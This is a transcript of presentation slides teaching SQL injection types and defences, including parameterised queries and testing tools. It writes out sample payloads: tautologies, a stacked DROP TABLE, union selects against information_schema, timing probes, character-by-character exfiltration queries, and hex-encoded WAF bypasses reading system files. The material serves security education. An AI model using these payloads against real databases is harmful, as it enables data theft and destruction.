sql injection vulnerabilities and how to prevent them
TRANSCRIPT
Jumping Bean
SQL Injection Vulnerabilities & How to stop them
Jumping Bean
About Me
● Mark Clarke – Solutions Architect at Jumping Bean,
– Java developer,
– Linux system administrator,
– Founding member of JoziJUG
● Contact– @mxc4- twitter,
– LinkedIn,
Jumping Bean
Where are we going?
● Why Cyber Security?● Attack vectors,● Why SQL injection?● Types of SQL injection,● How to prevent SQL injection exploits
Jumping Bean
Why Cyber Security?
● Recent notable breaches,– Sony,
– Target,
– Home Depo,
● Who is behind these breaches?– Organised crime,
– State sponsored cyber war,
● A legal requirement to secure data in many countries,
Jumping Bean
Attack Vectors
● People - social engineering e.g phishing, impersonating etc,● Devices – compromising the physical device, eg, replacing
firmware or physical chips,● Operating System – target vulnerabilities in the hosts operating
system,● Network – Intercepting or injecting network traffic. Network
services DNS, Web proxies etc,● Platforms – exploiting vulnerabilities in platform stacks e.g web
servers, database servers, technology stacks Java, .Net, PHP,● Applications - attacking applications directly, either standard
applications such as browsers or Flash or custom applications
Jumping Bean
Why focus on SQL Injection?
Jumping Bean
Web Application Attack Vectors(OWASP Top 10)
Source: OWASP TOP 10 2013
Jumping Bean
The Open Web Application Security Project (OWASP)
● OWASP Top 10 Project– Most Critical Web Application
Security Risks
– 2003,2004,2007,2010,2013
– Attack vectors changing as developers and organisations begin to address identified risks,
– Provide information to:● Understand the risks,● help developers address them
Jumping Bean
Web Application Vulnerabilities
Jumping Bean
Injection Attacks
● Application passes data that has not been sanitised to an interpreter of some kind:– LDAP queries,
– Xpath,
– NoSQL queries
– SQL queries,
– SMTP,
– Command interpreter
Jumping Bean
APT Attack Methodology
"Advanced persistent threat lifecycle" by Dell SecureWorks - http://www.secureworks.com/cyber-threat-intelligence/advanced-persistent-threats/understand-threat/. Licensed under CC BY-SA 3.0 via Wikimedia Commons
● Sophisticated attacks use “minor” security vulnerabilities to gain access and then escalate their privileges and gain further access to systems
Jumping Bean
What is SQL Injection (SQLi)?
● Unchecked input used to manipulate generated SQL statements – change the logic of the statement,
● Most effective against weakly typed languages,– PHP,
– Ruby, etc
● But any code that uses embedded SQL could be vulnerable i.e. JQL or JDBC statements,
● Manipulation of– URL parameters,
– Cookies,
– Form elements
E.G. Post Parameters username=”admin”pass=”SZK!k#$!DD”
orpass =”' or '1'='1”; <= SQL Injection
String username=request.getParameter("username"); String password=request.getParameter("pass");;//String password=
JDBCString query = "select id from users where username='”+ username+”' and password='"+password+”'”;
Java Persistence Query Languageem.createQuery("select id from users where username='”+ username+”' and password='"+password+”'”);
Jumping Bean
Types of SQL Injection
● Simple SQL injection– Tautologies, logic manipulation,
– Stacking queries
– Union queries,
– Command injection
● Error based,– Rely on error messages being output to the screen
● Blind SQL Injection– Content based attack,
– Timing attack
Jumping Bean
Simple SQL Injection - Tautologies
● Tautological injections – 1 or 1=1
– B') or 1=1; - -
Please preapre in advance!
● “Select desc,price,qty from orders where cust.id=”+id;
● Select desc,price,qty from orders where cust.id=1 or 1=1;
● “Select user from users where user='”+username+”' and pass = password('“+pass+“');
● Select user from users where user='a' and pass=password('B') or 1=1; - - ');
Jumping Bean
Simple SQL Injection -Stacking Queries
● Append additional SQL queries after escaping the original query,– “SELECT name,email, address FROM members where
id=”+id
– Parameter● “2; DROP TABLE users --”
– “SELECT name,email, address FROM members where id=2; Drop table users”
● Java is not vulnerable to stacked queries but some languages are. E.G. PHP
Jumping Bean
Simple SQL Injection - Union Queries
● Used to exfiltrate data via UI,– e.g. collection used to
populate a table for display
● Append a union SQL query to an exiting query,
● Need to match columns number and types
● “Select prodId, desc, brand,price from product where id=”+id;
– “1 union Select 1,grantee,privilege_type,1 from information_schema.user_privileges”
● How to determine number and type of columns?
– “1 order by 6”;
– Trial and error for column type
● Can convert numeric columns to string with cast function
Jumping Bean
SQL Command Injection
● System stored procedures may allow attackers to escalate their breach:– xp_cmdshell (mssql),
– source (mysql),
– LoadFIle (mysql)
● xp_regaddmultistring● xp_regdeletekey● xp_regdeletevalue● xp_regenumkeys● xp_regenumvalues● xp_regread
● Medias (xp_availablemedia) ● ODBC Resources (xp_enumdsn) ● Managing Services
(xp_servicecontrol) ● Login mode (xp_loginconfig) ● Creating Cab Files (xp_makecab)
Jumping Bean
Error Based SQL Injection
● Relies on poor or non-existent error handling in code,
● Extract data via crafted SQL errors,
● "Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Something' AND Something > ('Something')' at line 1"
Jumping Bean
SQL Blind Injection
● No error message sent to screen. User is either redirected to an standard error page or page just fails to render properly– Easily implemented by a global error catcher.
● Bad News – your application is still susceptible to SQL injection
● Blind SQL injection is when the result of the query has to be inferred either:– content based,based on response size,
– or a timing attack
Jumping Bean
Blind SQL Injection - Content Based
● Observe out come of parameter tampering e.g– Www.example.com/products.jsp?id=4
– www.example.com/products.jsp?id=5-1
● Generate a true and false result and compare response differences– Www.example.com/products.jsp?id=5-6;
– Www.example.com/products.jsp?id=5 and 1=0
Jumping Bean
Blind SQL Injection – Timing Based
● MSSQL – waitfor command
– if (select user) = 'sa' waitfor delay '0:0:10'
● MySQL – sleep, benchmark
– IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1)) ,
– Select distinct if(table_name='users',sleep(1),table_name) from tables;
● Exfiltrate data
– Select id,desc,price from products where product=1 and substring(Select TABLE_NAME from information_schema.tables limit 1)='a';
– Select id,desc,price from products where product=1 and substring(Select TABLE_NAME from information_schema.tables limit 1)='b';
– Select id,desc,price from products where product=1 and substring(Select TABLE_NAME from information_schema.tables limit 1,2,1)='a';
Jumping Bean
SQL Prevention Measures
● Web Application Firewalls (WAF)– Used to protect against unknown vulnerability,
– mod_security for Apache,
– Uses pattern matching rules
– Problem: easy to bypass● Char() function● Select 0xaa → hexadecimal bypass● SELECT CONCAT('0x',HEX('c:\\boot.ini')● SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
● SQL White listing,– Input validation, sanitisation routines,
– PHP add_slashes, mysql_real_escape_string vulnerablities
● Not the best ways
Jumping Bean
Coding Best Practice
● Use of Prepared Statements (Parametrized Queries)– Java
● JDBC prepared statements,● JPA createQuery with named
parameters or place holders,● Use criteria API,
– PHP ● PDO
● Use of Stored Procedures
● JDBC String updateStatement = "update COFFEES " + "set TOTAL = TOTAL + ? " + "where COF_NAME = ?";
updateSales.setInt(1,300);updateSales.setString(2, “Java”);updateSales.executeUpdate();
● JPAQuery qry = em.createQuery("SELECT c FROM Customer c WHERE c.cust_id=:cust_id")
qry.setParameter("cust_id", cust_id)qry.getSingleResult();
Jumping Bean
SQL Injection Testing?
● Write unit tests to check for parameter tampering,
● Penetration testing tools: (fuzzing)– Sqlmap,
– SQLNinja
– Zed Attack Proxy (ZAP) from OWASP
Jumping Bean
The End
● Mark Clarke
– Jumping Bean
– Certified Ethical Hacker Training